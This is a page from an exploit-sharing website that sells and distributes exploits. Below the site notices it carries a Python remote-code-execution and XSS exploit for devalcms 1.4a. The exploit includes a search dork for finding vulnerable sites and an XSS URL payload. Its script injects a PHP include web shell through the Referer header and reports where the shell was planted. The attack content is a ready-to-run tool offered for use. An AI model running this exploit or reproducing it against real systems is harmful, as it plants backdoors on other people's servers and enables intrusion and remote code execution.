0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
devalcms 1.4a XSS / Remote Code Execution Exploit
================================================= devalcms 1.4a XSS / Remote Code Execution Exploit ================================================= #!/usr/bin/python ##################################################################################### #### devalcms v1.4a Remote Code Execution Exploit / Xss #### ##################################################################################### #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # ##################################################################################### # # #Download : http://www.sourceforge.net/projects/devalcms # # # #DORK : "powered by devalcms v1.4.a" # # # ##################################################################################### # [Xss] # # # #http://Site/[path]/index.php?currentpath=<script>alert('Xss')</script> # # # ##################################################################################### # # # [Remote Code Execution] # # # #Use this exploit for remote code execution valun . # # # ##################################################################################### # Site : Http://IRCRASH.COM # ###################################### TNX GOD ###################################### import sys,socket argv=sys.argv data='<?php include $_GET[\'evil\']; ?>' query='/modules/tool/hitcounter.php?gv_folder_data=./url2header.php%00' if len(argv) < 3 : print '[*]Devalcms v1.4.a Remote code execut exploit' print '[*]Dork : powered by devalcms v1.4.a' print '[*]Powered by : R3d.W0rm' print '[*]Our Site : http://ircrash.com' print '[*]Usage : ' + argv[0] + ' site /path' exit() if 'http://' in argv[1] : target=argv[1].replace('http://','') else : target=argv[1] if '/' in argv[2] : path=argv[2] else : path='/' + argv[2] print '[*]Devalcms v1.4.a Remote code execut exploit' print '[*]Powered by : R3d.W0rm' print '[*]Our Site : http://ircrash.com' sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target,80)) sock.send("GET " + path + query + " HTTP/1.1\n") sock.send("Host: " + target + "\n") sock.send("Referer: " + data + "\n\n\n") recv=sock.recv(2048) if 'HTTP/1.1 200 OK' in recv : print '[+]Code injected .' print '[+]Code inject in http://: ' + target + path + '/modules/tool/url2header.php' else : print '[-]Can not inject code.' exit() # 0day.today [2024-12-26] #